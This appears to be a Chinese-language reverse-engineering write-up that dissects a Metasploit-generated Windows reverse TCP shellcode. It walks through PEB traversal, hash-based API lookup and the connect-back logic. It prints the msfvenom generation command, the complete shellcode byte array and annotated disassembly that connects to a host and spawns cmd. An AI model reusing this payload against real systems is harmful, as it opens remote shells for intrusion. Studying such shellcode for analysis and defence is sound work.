基本分析

生成指令:

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1111 -f c

生成结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32"
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x01\x68\x02"
"\x00\x04\x57\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5"
"\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5";

实际对应的汇编语言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
.data:00404060                 cld
.data:00404061 call loc_4040E8
.data:00404066 pusha
.data:00404067 mov ebp, esp
.data:00404069 xor eax, eax
.data:0040406B mov edx, fs:[eax+30h]
.data:0040406F mov edx, [edx+0Ch]
.data:00404072 mov edx, [edx+14h]
.data:00404075
.data:00404075 loc_404075: ; CODE XREF: uchar * buf+86↓j
.data:00404075 mov esi, [edx+28h]
.data:00404078 movzx ecx, word ptr [edx+26h]
.data:0040407C xor edi, edi
.data:0040407E
.data:0040407E loc_40407E: ; CODE XREF: uchar * buf+2A↓j
.data:0040407E lodsb
.data:0040407F cmp al, 61h ; 'a'
.data:00404081 jl short loc_404085
.data:00404083 sub al, 20h ; ' '
.data:00404085
.data:00404085 loc_404085: ; CODE XREF: uchar * buf+21↑j
.data:00404085 ror edi, 0Dh
.data:00404088 add edi, eax
.data:0040408A loop loc_40407E
.data:0040408C push edx
.data:0040408D push edi
.data:0040408E mov edx, [edx+10h]
.data:00404091 mov ecx, [edx+3Ch]
.data:00404094 mov ecx, [ecx+edx+78h]
.data:00404098 jecxz short loc_4040E2
.data:0040409A add ecx, edx
.data:0040409C push ecx
.data:0040409D mov ebx, [ecx+20h]
.data:004040A0 add ebx, edx
.data:004040A2 mov ecx, [ecx+18h]
.data:004040A5
.data:004040A5 loc_4040A5: ; CODE XREF: uchar * buf+5F↓j
.data:004040A5 jecxz short loc_4040E1
.data:004040A7 dec ecx
.data:004040A8 mov esi, [ebx+ecx*4]
.data:004040AB add esi, edx
.data:004040AD xor edi, edi
.data:004040AF
.data:004040AF loc_4040AF: ; CODE XREF: uchar * buf+57↓j
.data:004040AF lodsb
.data:004040B0 ror edi, 0Dh
.data:004040B3 add edi, eax
.data:004040B5 cmp al, ah
.data:004040B7 jnz short loc_4040AF
.data:004040B9 add edi, [ebp-8]
.data:004040BC cmp edi, [ebp+24h]
.data:004040BF jnz short loc_4040A5
.data:004040C1 pop eax
.data:004040C2 mov ebx, [eax+24h]
.data:004040C5 add ebx, edx
.data:004040C7 mov cx, [ebx+ecx*2]
.data:004040CB mov ebx, [eax+1Ch]
.data:004040CE add ebx, edx
.data:004040D0 mov eax, [ebx+ecx*4]
.data:004040D3 add eax, edx
.data:004040D5 mov [esp+28h+var_4], eax
.data:004040D9 pop ebx
.data:004040DA pop ebx
.data:004040DB popa
.data:004040DC pop ecx
.data:004040DD pop edx
.data:004040DE push ecx
.data:004040DF jmp eax
.data:004040E1 ; ---------------------------------------------------------------------------
.data:004040E1
.data:004040E1 loc_4040E1: ; CODE XREF: uchar * buf:loc_4040A5↑j
.data:004040E1 pop edi
.data:004040E2
.data:004040E2 loc_4040E2: ; CODE XREF: uchar * buf+38↑j
.data:004040E2 pop edi
.data:004040E3 pop edx
.data:004040E4 mov edx, [edx]
.data:004040E6 jmp short loc_404075
.data:004040E6 ?buf@@3PAEA endp ; sp-analysis failed
.data:004040E6
.data:004040E8 ; ---------------------------------------------------------------------------
.data:004040E8
.data:004040E8 loc_4040E8: ; CODE XREF: uchar * buf+1↑p
.data:004040E8 pop ebp
.data:004040E9 push 3233h
.data:004040EE push 5F327377h
.data:004040F3 push esp
.data:004040F4 push 726774Ch
.data:004040F9 call ebp
.data:004040FB mov eax, 190h
.data:00404100 sub esp, eax
.data:00404102 push esp
.data:00404103 push eax
.data:00404104 push 6B8029h
.data:00404109 call ebp
.data:0040410B push eax
.data:0040410C push eax
.data:0040410D push eax
.data:0040410E push eax
.data:0040410F inc eax
.data:00404110 push eax
.data:00404111 inc eax
.data:00404112 push eax
.data:00404113 push 0E0DF0FEAh
.data:00404118 call ebp
.data:0040411A xchg eax, edi
.data:0040411B push 5
.data:0040411D push 101A8C0h
.data:00404122 push 57040002h
.data:00404127 mov esi, esp
.data:00404129
.data:00404129 loc_404129: ; CODE XREF: .data:0040413B↓j
.data:00404129 push 10h
.data:0040412B push esi
.data:0040412C push edi
.data:0040412D push 6174A599h
.data:00404132 call ebp
.data:00404134 test eax, eax
.data:00404136 jz short loc_404144
.data:00404138 dec dword ptr [esi+8]
.data:0040413B jnz short loc_404129
.data:0040413D push 56A2B5F0h
.data:00404142 call ebp
.data:00404144
.data:00404144 loc_404144: ; CODE XREF: .data:00404136↑j
.data:00404144 push 646D63h
.data:00404149 mov ebx, esp
.data:0040414B push edi
.data:0040414C push edi
.data:0040414D push edi
.data:0040414E xor esi, esi
.data:00404150 push 12h
.data:00404152 pop ecx
.data:00404153
.data:00404153 loc_404153: ; CODE XREF: .data:00404154↓j
.data:00404153 push esi
.data:00404154 loop loc_404153
.data:00404156 mov word ptr [esp+3Ch], 101h
.data:0040415D lea eax, [esp+10h]
.data:00404161 mov byte ptr [eax], 44h ; 'D'
.data:00404164 push esp
.data:00404165 push eax
.data:00404166 push esi
.data:00404167 push esi
.data:00404168 push esi
.data:00404169 inc esi
.data:0040416A push esi
.data:0040416B dec esi
.data:0040416C push esi
.data:0040416D push esi
.data:0040416E push ebx
.data:0040416F push esi
.data:00404170 push 863FCC79h
.data:00404175 call ebp
.data:00404177 mov eax, esp
.data:00404179 dec esi
.data:0040417A push esi
.data:0040417B inc esi
.data:0040417C push dword ptr [eax]
.data:0040417E push 601D8708h
.data:00404183 call ebp
.data:00404185 mov ebx, 56A2B5F0h
.data:0040418A push 9DBD95A6h
.data:0040418F call ebp
.data:00404191 cmp al, 6
.data:00404193 jl short loc_40419F
.data:00404195 cmp bl, 0E0h
.data:00404198 jnz short loc_40419F
.data:0040419A mov ebx, 6F721347h
.data:0040419F
.data:0040419F loc_40419F: ; CODE XREF: .data:00404193↑j
.data:0040419F ; .data:00404198↑j
.data:0040419F push 0
.data:004041A1 push ebx
.data:004041A2 call ebp

但是上述shellcode当中可能存在有将数据当中代码的情况,并且需要找出这个分析失败的原因

只需要更改出错的函数的大小就行

对应的反汇编

动态获取kernelbase

1
2
3
4
5
6
mov eax, dword ptr fs : [0x30]//此处偏移就是PEB位置
mov eax, dword ptr[eax+0xC]//模块列表LDR地址
mov eax, dword ptr[eax + 0x1C]//InInitializationOrderModuleList地址
mov eax, [eax]//使InInitializationOrderModuleList指向第二个元素,也就是该链表维护的第二个模块
mov eax,dword ptr[eax+0x8]//dllbase距离链表的距离
mov dwBase,eax//第一个模块就是kernel32也有可能是kernelbase实际上是第二个模块
InMemoryOrderModuleList 是一个 _LIST_ENTRY 结构,定义了进程加载的模块按内存顺序排列的链表。链表中的每个节点代表一个加载的模块(通常是DLL)

所以

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY

都可以访问到加载模块基地址,只是排列顺序不同,所以偏移不一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
0:000> !peb
PEB at 0024b000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00ca0000
NtGlobalFlag: 70
NtGlobalFlag2: 0
Ldr 77f75d80
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 00583760 . 005857f0
Ldr.InLoadOrderModuleList: 00583858 . 0058e620
Ldr.InMemoryOrderModuleList: 00583860 . 0058e628
Base TimeStamp Module
ca0000 677e8efc Jan 08 22:43:08 2025 C:\Users\Aiyakami\Desktop\trust\shellcodeTest.exe
77e50000 6ce0f861 Nov 20 11:56:17 2027 C:\WINDOWS\SYSTEM32\ntdll.dll
76100000 C:\WINDOWS\System32\KERNEL32.DLL
76300000 C:\WINDOWS\System32\KERNELBASE.dll
6e880000 C:\WINDOWS\SYSTEM32\apphelp.dll
75e60000 6763d3a2 Dec 19 16:04:50 2024 C:\WINDOWS\System32\ucrtbase.dll
75cb0000 C:\WINDOWS\SYSTEM32\VCRUNTIME140.dll

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

上述dump中InLoadOrderModuleList,InInitializationOrderModuleList都还没有值是因为程序还没加载完成所以操作系统还没有值

1
2
3
4
5
.data:0040406B                 mov     edx, fs:[eax+30h]//进程环境块PEB位置
.data:0040406F mov edx, [edx+0Ch]//模块列表(LDR)的地址
.data:00404072 mov edx, [edx+14h]//InMemoryOrderModuleList首模块(应该是进程自身)
.data:00404075 mov esi, [edx+28h]//BaseDllName#buffer字段
.data:00404078 movzx ecx, word ptr [edx+26h]//BaseDllName#MaximumLength字段

对应的结构

整理的有点乱,上述是对于手动查找kernelbase的汇编代码进行研究,实际上的网上能找到的有多种不同的汇编代码都能实现,原因是可以分别通过下面三张表找到,用的表不同时,汇编代码就会有所不同:

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

直接XDBG中dump下来,其内容如下,除了动态获取kernelbase调用api的部分比较难理解,后续的建立TCP反向连接,和接收远程shellcode并分配内存执行就不深入研究了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
00CA4060 | FC                       | cld                                 
00CA4061 | E8 82000000 | call shellcodetest.CA40E8


//通过hash值动态调用函数(此处算法需要改)
00CA4066 | 60 | pushad
00CA4067 | 89E5 | mov ebp,esp
00CA4069 | 31C0 | xor eax,eax
00CA406B | 64:8B50 30 | mov edx,dword ptr fs:[eax+30]
00CA406F | 8B52 0C | mov edx,dword ptr ds:[edx+C]
00CA4072 | 8B52 14 | mov edx,dword ptr ds:[edx+14]
00CA4075 | 8B72 28 | mov esi,dword ptr ds:[edx+28]
00CA4078 | 0FB74A 26 | movzx ecx,word ptr ds:[edx+26]
00CA407C | 31FF | xor edi,edi
00CA407E | AC | lodsb
00CA407F | 3C 61 | cmp al,61
00CA4081 | 7C 02 | jl shellcodetest.CA4085
00CA4083 | 2C 20 | sub al,20
00CA4085 | C1CF 0D | ror edi,D
00CA4088 | 01C7 | add edi,eax
00CA408A | E2 F2 | loop shellcodetest.CA407E
00CA408C | 52 | push edx
00CA408D | 57 | push edi
00CA408E | 8B52 10 | mov edx,dword ptr ds:[edx+10]
00CA4091 | 8B4A 3C | mov ecx,dword ptr ds:[edx+3C]
00CA4094 | 8B4C11 78 | mov ecx,dword ptr ds:[ecx+edx+78]
00CA4098 | E3 48 | jecxz shellcodetest.CA40E2
00CA409A | 01D1 | add ecx,edx
00CA409C | 51 | push ecx
00CA409D | 8B59 20 | mov ebx,dword ptr ds:[ecx+20]
00CA40A0 | 01D3 | add ebx,edx
00CA40A2 | 8B49 18 | mov ecx,dword ptr ds:[ecx+18]
00CA40A5 | E3 3A | jecxz shellcodetest.CA40E1
00CA40A7 | 49 | dec ecx
00CA40A8 | 8B348B | mov esi,dword ptr ds:[ebx+ecx*4]
00CA40AB | 01D6 | add esi,edx
00CA40AD | 31FF | xor edi,edi
00CA40AF | AC | lodsb
00CA40B0 | C1CF 0D | ror edi,D
00CA40B3 | 01C7 | add edi,eax
00CA40B5 | 38E0 | cmp al,ah
00CA40B7 | 75 F6 | jne shellcodetest.CA40AF
00CA40B9 | 037D F8 | add edi,dword ptr ss:[ebp-8]
00CA40BC | 3B7D 24 | cmp edi,dword ptr ss:[ebp+24]
00CA40BF | 75 E4 | jne shellcodetest.CA40A5
00CA40C1 | 58 | pop eax
00CA40C2 | 8B58 24 | mov ebx,dword ptr ds:[eax+24]
00CA40C5 | 01D3 | add ebx,edx
00CA40C7 | 66:8B0C4B | mov cx,word ptr ds:[ebx+ecx*2]
00CA40CB | 8B58 1C | mov ebx,dword ptr ds:[eax+1C]
00CA40CE | 01D3 | add ebx,edx
00CA40D0 | 8B048B | mov eax,dword ptr ds:[ebx+ecx*4]
00CA40D3 | 01D0 | add eax,edx
00CA40D5 | 894424 24 | mov dword ptr ss:[esp+24],eax
00CA40D9 | 5B | pop ebx
00CA40DA | 5B | pop ebx
00CA40DB | 61 | popad
00CA40DC | 59 | pop ecx
00CA40DD | 5A | pop edx
00CA40DE | 51 | push ecx
00CA40DF | FFE0 | jmp eax
00CA40E1 | 5F | pop edi
00CA40E2 | 5F | pop edi
00CA40E3 | 5A | pop edx
00CA40E4 | 8B12 | mov edx,dword ptr ds:[edx]
00CA40E6 | EB 8D | jmp shellcodetest.CA4075


//建立TCP反向连接 这一段中的call ebp就是call上面一个函数
00CA40E8 | 5D | pop ebp
00CA40E9 | 68 33320000 | push 3233
00CA40EE | 68 7773325F | push 5F327377
00CA40F3 | 54 | push esp
00CA40F4 | 68 4C772607 | push 726774C
00CA40F9 | FFD5 | call ebp
00CA40FB | B8 90010000 | mov eax,190
00CA4100 | 29C4 | sub esp,eax
00CA4102 | 54 | push esp
00CA4103 | 50 | push eax
00CA4104 | 68 29806B00 | push 6B8029
00CA4109 | FFD5 | call ebp
00CA410B | 50 | push eax
00CA410C | 50 | push eax
00CA410D | 50 | push eax
00CA410E | 50 | push eax
00CA410F | 40 | inc eax
00CA4110 | 50 | push eax
00CA4111 | 40 | inc eax
00CA4112 | 50 | push eax
00CA4113 | 68 EA0FDFE0 | push E0DF0FEA
00CA4118 | FFD5 | call ebp
00CA411A | 97 | xchg edi,eax
00CA411B | 6A 05 | push 5
00CA411D | 68 C0A80101 | push 101A8C0 主机ip地址
00CA4122 | 68 02000457 | push 57040002 主机端口号
00CA4127 | 89E6 | mov esi,esp
00CA4129 | 6A 10 | push 10
00CA412B | 56 | push esi
00CA412C | 57 | push edi
00CA412D | 68 99A57461 | push 6174A599
00CA4132 | FFD5 | call ebp
00CA4134 | 85C0 | test eax,eax
00CA4136 | 74 0C | je shellcodetest.CA4144
00CA4138 | FF4E 08 | dec dword ptr ds:[esi+8]
00CA413B | 75 EC | jne shellcodetest.CA4129
00CA413D | 68 F0B5A256 | push 56A2B5F0
00CA4142 | FFD5 | call ebp


//如果连接成功 接收并执行命令
00CA4144 | 68 636D6400 | push 646D63
00CA4149 | 89E3 | mov ebx,esp
00CA414B | 57 | push edi
00CA414C | 57 | push edi
00CA414D | 57 | push edi
00CA414E | 31F6 | xor esi,esi
00CA4150 | 6A 12 | push 12
00CA4152 | 59 | pop ecx
00CA4153 | 56 | push esi
00CA4154 | E2 FD | loop shellcodetest.CA4153
00CA4156 | 66:C74424 3C 0101 | mov word ptr ss:[esp+3C],101
00CA415D | 8D4424 10 | lea eax,dword ptr ss:[esp+10]
00CA4161 | C600 44 | mov byte ptr ds:[eax],44
00CA4164 | 54 | push esp
00CA4165 | 50 | push eax
00CA4166 | 56 | push esi
00CA4167 | 56 | push esi
00CA4168 | 56 | push esi
00CA4169 | 46 | inc esi
00CA416A | 56 | push esi
00CA416B | 4E | dec esi
00CA416C | 56 | push esi
00CA416D | 56 | push esi
00CA416E | 53 | push ebx
00CA416F | 56 | push esi
00CA4170 | 68 79CC3F86 | push 863FCC79
00CA4175 | FFD5 | call ebp
00CA4177 | 89E0 | mov eax,esp
00CA4179 | 4E | dec esi
00CA417A | 56 | push esi
00CA417B | 46 | inc esi
00CA417C | FF30 | push dword ptr ds:[eax]
00CA417E | 68 08871D60 | push 601D8708
00CA4183 | FFD5 | call ebp